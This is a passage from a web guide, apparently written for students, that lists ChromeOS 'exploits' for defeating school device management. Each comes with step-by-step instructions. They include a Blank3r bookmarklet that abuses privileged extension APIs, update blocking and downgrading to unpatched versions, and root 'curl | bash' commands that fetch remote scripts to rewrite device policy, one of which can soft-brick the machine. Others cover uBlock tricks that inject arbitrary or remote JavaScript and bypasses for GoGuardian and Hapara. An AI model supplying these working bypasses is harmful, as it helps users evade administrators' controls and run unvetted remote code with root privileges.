  3. Click the + sign next to the WiFi name of each network that you commonly connect your Chromebook to.
  4. We are going to make it so that when the Chromebook is connected to those networks, it will not check for updates.
  5. Use ctrl+a and ctrl+c to copy all the text on the entire network#state page.
  6. Go to ./caub.html.
  7. Paste the copied text into the textbox below.
  8. Press the generate onc button below the textbox.
  9. Once you have downloaded the file, go to chrome://network#general.
  10. Click on the import ONC button.
  11. Import the newly downloaded file.

Extra notes

CAUB Flags Prevent Updates

This alt exploit keeps your Chromebook downgraded (or on the current version) without automatic updates screwing you over. This exploit was found by MechaXYZ. Using a Chrome flag, you can convince your Chromebook not to automatically update.

Requirements

Getting started

  1. Go to chrome://flags#show-metered-toggle or search "metered" in chrome://flags instead.
  2. Enable it and restart your device.
  3. Open the Settings app.
  4. Go to your Network >> Advanced >> Show metered toggle and turn it on

Extra notes

Blank3r

Blank3r is an exploit that allows you to run bookmarklets on privileged pages, such as the Chrome extensions page. This exploit was made with Point Blank as well.

Requirements

Getting started

  1. Bookmark this code:
javascript:let shim = false;var ids = prompt("extension ids (comma separated)").split(",");setInterval(()=>{ids.forEach((id)=> opener.chrome.developerPrivate.updateExtensionConfiguration({extensionId: id, fileAccess: shim}));shim = !shim;}, 145);
  1. Navigate to chrome://extensions.
  2. Click on an extension that YOU installed from the Chrome Web Store > Details.
  3. In the URL bar, copy the string of letters and numbers after the /?id=.
  4. Click "View in Chrome Web Store" and spam the escape key. If it loads into Chrome Webstore try again, if it is a blank screen click the bookmarklet.
  5. Paste the ID of the extension into the prompt separated by commas.

If you close the tab, the exploit will stop working.

Downgrading Change versions

Downgrading can be used for several exploits, to get to a version that does not have patches for certain exploits, such as LTBEEF, SH1MMER, or CryptoSmite. This is a built-in feature of ChromeOS.

Please do note that depending on your kernver= you may not be able to downgrade to certain versions. More info is at the Finding Kernver section.

Requirements

Setup

  1. Navigate to chrome://version on the Chromebook you wish to downgrade. If that is blocked try chrome://system/:~:text=CHROMEOS_RELEASE_DESCRIPTION, and check for your board under Platform. For me, that would be octopus.

chrome://version

  1. Navigate to chrome100.dev , press ctrl+f and type in your board.
  2. Find and download the Chrome version you want to your personal computer.

Downgrading

  1. Install Chromebook Recovery Utility onto your personal computer.
  2. Open the extension, click on the settings button in the top right-hand corner, and click "Use local image".
  3. Select the recovery image you downloaded from chrome100.
  4. Plug in the USB you wish to use, and follow the prompts on the screen.
  5. On your Chromebook, press esc+reload+power and follow the prompts.
  6. On the checking for updates screen or Wi-Fi selection screen, press ctrl+alt+e to skip the "checking for updates" screen.

Pollen Policy Editor

chromeOS User Policy Editor

Requirements

Getting started

There are two modes for this, I recommend just using the first one.

Normal

  1. Open Crosh (Ctrl+Alt+T)
  2. Run the following commands:
shell
sudo su
curl -Ls https://mercuryworkshop.github.io/Pollen/Pollen.sh | bash
  1. Done! It may take a few seconds for the new policy to apply. If it does not apply, press alt+vol_up+x.

PollenFS (RootFS)

Disabling RootFS will Soft-Brick your Chromebook when booting back into normal mode.

  1. Open Crosh (Ctrl+Alt+T)
  2. Run the following commands:
shell
sudo su
curl -Ls https://mercuryworkshop.github.io/Pollen/RootFS.sh | bash
  1. Reboot
  2. Go Through Steps 1-3 Again
  3. Run the following command:
curl -Ls https://mercuryworkshop.github.io/Pollen/PollenFS.sh | bash
  1. Done! Your Pollen configuration is now permanently applied!

Further Reading

Killcurly Break extensions

Kill the extension by signing out.

  1. Visit chrome://settings/signOut.
  2. Press the big blue button.
  3. Go to chrome://restart
  4. Now visit tinyurl.com/AddSession or this link
  5. Add your SCHOOL account back. It WILL NOT WORK if you add a home account back. This is just so you can still access Google Drive, YouTube, and any Google service.
  6. All extensions should stop working.
  7. Note that you must repeat this every time you restart or sign out.
  8. If your Chrome version is v112 or above, this exploit will no longer work, the bypass to this is listed further on.

Credit to Zoroark

Shimboot Boot Linux

Shimboot is a collection of scripts for patching a Chrome OS RMA shim to serve as a bootloader for a standard Linux distribution. It allows you to boot a full desktop Debian install on a Chromebook, without needing to unenroll it or modify the firmware.

For more detailed information, please see the project's README.

Credit to vk6 for this exploit

Further reading

uBlock Run Run Code On Pages

If your school allows the uBlock Origin chrome extension, then running any bookmarklet is possible.

Requirements

Getting started

  1. Make sure you have uBlock Origin installed.

  2. Go to the extension's settings

  3. Under the settings tab, check the "I am an advanced user" box, then click on the small cog icon.

  4. Find userResourcesLocation and change it from unset to JS

  5. Goe My filters tab of the settings and add the following line:

*##+js(execute_script.js)
  1. Now press ctr+alt+tilde (~) to run code on the current page
  2. Have fun!

uRun - Bypass bookmarklet restrictions with uBlock

From Inglan2

Recently Google cracked down on bookmarklets and now they don't work (Its based on the DeveloperToolsAvailability policy). I wanted to run scripts still so I started making this, inspired by uBlock Run Run Code On Pages, but with more features, like saving scripts.

  1. Open uBlock settings
  2. Enable advanced settings, and click the gear ⚙️ button

[!CAUTION] DO NOT MODIFY ANYTHING ELSE ON THIS PAGE, UNLESS YOU KNOW WHAT YOU ARE DOING (you probably don't), AS YOU COULD BREAK SOMETHING.

[!TIP] If you mess up, go to the home of settings and at the bottom click reset to default settings

  1. Add the script

    Change

    userResourcesLocation unset
    

    to

    userResourcesLocation https://inglan2.github.io/uRun/urun.js
    

[!TIP] It's down the bottom 4. Set a filter to load uRun After closing the advanced settings tab, go to the filters tab and add this:

*##+js(urun.js)

Usage

Simply press Ctrl + Shift + ` to open the menu and from there you can run and create scripts. To add a script, press the ➕ button up the top right, and enter the code you would like to add (without the javascript: part).

Quick View Bypass extensions

Requirements

QuickView is a universal webview exploit in Chrome OS that utilizes the QuickOffice component extension. This exploit lets you create login windows with arbitrary URLs, thus allowing you to load pages without any extensions.

Go to quickview-exploit.pages.dev and follow the instructions

Further reading

Buypass Bypass extensions

What it can and can't do

Getting started

Visit any of the links below:

Further reading

Chaos Hapara bypass

Devtools must not be blocked by policy to perform this exploit.

Go to this link and follow instructions

Further Reading:

SOT Exploit OneTab bypass

  1. Download this extension One Tab
  2. Click the import button in the settings tab.
  3. Copy-paste the URL you wish to visit about 100 times, and then click import.
  4. Spam click the top link, then either spam escape on one of them or wait for one to load on a about:blank page.

Credit to Coding4Hours

GoGuardian GoAway GoGuardian bypass

No idea whatsoever how this went through

THIS EXPLOIT WILL NOT WORK FOR YOU IF YOU HAVE ANY OTHER EXTENSION BESIDES GOGUARDIAN

Getting Started

  1. Obviously (but still needs to be said due to skids), make sure GoGuardian is actually installed
  2. Visit the attached URL in a new tab
  3. On that tab there will be a simple white screen with nothing on it, reload the page
  4. If the GET request fails and you are left on an error screen (don't panic, this is intended, continue)
  5. Visit `chrome://restart`` to clear cached sites from GoGuardian

Credit to akabutnice